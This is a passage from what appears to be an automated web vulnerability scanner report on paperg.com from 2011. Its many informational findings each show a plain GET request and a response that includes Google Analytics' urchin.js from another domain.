Host:   http://www.paperg.com
Path:   /flyerboard/mount--loretto/1753/45967.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /flyerboard/mount--loretto/1753/45967.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:19:14 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 4107
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

...[SNIP]...
</div>
   
   <script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
13.25. http://www.paperg.com/flyerboard/mount-loretto/1552/45967.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /flyerboard/mount-loretto/1552/45967.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /flyerboard/mount-loretto/1552/45967.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:19:16 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 4107
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

...[SNIP]...
</div>
   
   <script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
13.26. http://www.paperg.com/flyerboard/northwoods-health/1552/45935.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /flyerboard/northwoods-health/1552/45935.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /flyerboard/northwoods-health/1552/45935.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:19:13 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 4118
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

...[SNIP]...
</div>
   
   <script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
13.27. http://www.paperg.com/flyerboard/northwoods-health/1753/45935.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /flyerboard/northwoods-health/1753/45935.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /flyerboard/northwoods-health/1753/45935.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:19:13 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 4118
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

...[SNIP]...
</div>
   
   <script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
13.28. http://www.paperg.com/flyerboard/nyprig/1552/45945.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /flyerboard/nyprig/1552/45945.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /flyerboard/nyprig/1552/45945.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:19:14 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 4071
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

...[SNIP]...
</div>
   
   <script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
13.29. http://www.paperg.com/flyerboard/nyprig/1753/45945.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /flyerboard/nyprig/1753/45945.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /flyerboard/nyprig/1753/45945.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:19:16 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 4071
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

...[SNIP]...
</div>
   
   <script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
13.30. http://www.paperg.com/flyerboard/old-songs-festival/1552/45413.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /flyerboard/old-songs-festival/1552/45413.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /flyerboard/old-songs-festival/1552/45413.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:19:14 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 4179
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

...[SNIP]...
</div>
   
   <script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
13.31. http://www.paperg.com/flyerboard/olsens/1552/42482.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /flyerboard/olsens/1552/42482.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /flyerboard/olsens/1552/42482.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:19:12 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 4074
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

...[SNIP]...
</div>
   
   <script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
13.32. http://www.paperg.com/flyerboard/pathways/1552/43051.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /flyerboard/pathways/1552/43051.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /flyerboard/pathways/1552/43051.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:19:14 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 4082
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

...[SNIP]...
</div>
   
   <script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
13.33. http://www.paperg.com/flyerboard/pathways/1753/43051.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /flyerboard/pathways/1753/43051.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /flyerboard/pathways/1753/43051.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:19:13 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 4082
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

...[SNIP]...
</div>
   
   <script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
13.34. http://www.paperg.com/flyerboard/residence-inn-by-marriott/1552/45964.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /flyerboard/residence-inn-by-marriott/1552/45964.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /flyerboard/residence-inn-by-marriott/1552/45964.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:19:13 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 4164
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

...[SNIP]...
</div>
   
   <script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
13.35. http://www.paperg.com/flyerboard/residence-inn-by-marriott/1753/45964.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /flyerboard/residence-inn-by-marriott/1753/45964.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /flyerboard/residence-inn-by-marriott/1753/45964.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:19:13 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 4164
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

...[SNIP]...
</div>
   
   <script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
13.36. http://www.paperg.com/flyerboard/seton-health/1552/45970.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /flyerboard/seton-health/1552/45970.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /flyerboard/seton-health/1552/45970.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:19:14 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 4091
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

...[SNIP]...
</div>
   
   <script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
13.37. http://www.paperg.com/flyerboard/seton-health/1753/45970.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /flyerboard/seton-health/1753/45970.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /flyerboard/seton-health/1753/45970.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:19:14 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 4091
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

...[SNIP]...
</div>
   
   <script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
13.38. http://www.paperg.com/flyerboard/your-business-or-event-could-be-here/1552/222.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /flyerboard/your-business-or-event-could-be-here/1552/222.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /flyerboard/your-business-or-event-could-be-here/1552/222.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:19:13 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 4814
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

...[SNIP]...
</div>
   
   <script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
13.39. http://www.paperg.com/join.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /join.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /join.php HTTP/1.1
Host: www.paperg.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.paperg.com/support.php
Cookie: PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305561344.2; __utmc=1; __utmz=1.1305561344.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=27786045.1907620487.1305558925.1305558925.1305561354.2; __utmc=27786045; __utmz=27786045.1305558925.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmb=1.1.10.1305561344; __utmb=27786045

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 16:14:00 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
Vary: Accept-Encoding
Content-Type: text/html
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 12598


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
13.40. http://www.paperg.com/press.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /press.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /press.php HTTP/1.1
Host: www.paperg.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.placelocal.com/
Cookie: PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305561344.2; __utmc=1; __utmz=1.1305561344.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=27786045.1907620487.1305558925.1305558925.1305561354.2; __utmc=27786045; __utmz=27786045.1305558925.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmb=1.1.10.1305561344; __utmb=27786045

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 16:20:32 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
Vary: Accept-Encoding
Content-Type: text/html
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 13132

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
13.41. http://www.paperg.com/publishers/flyerboard.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /publishers/flyerboard.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /publishers/flyerboard.php HTTP/1.1
Host: www.paperg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 14:45:35 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
Cache-Control: max-age=0
Expires: Mon, 16 May 2011 14:45:35 GMT
Vary: Accept-Encoding
Content-Type: text/html
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 14896

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
13.42. http://www.paperg.com/publishers/placelocal.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /publishers/placelocal.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /publishers/placelocal.php HTTP/1.1
Host: www.paperg.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.placelocal.com/
Cookie: PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305561344.2; __utmc=1; __utmz=1.1305561344.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=27786045.1907620487.1305558925.1305558925.1305561354.2; __utmc=27786045; __utmz=27786045.1305558925.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmb=1.1.10.1305561344; __utmb=27786045

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 16:20:15 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
Vary: Accept-Encoding
Content-Type: text/html
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 13131

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
13.43. http://www.paperg.com/support.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /support.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /support.php HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
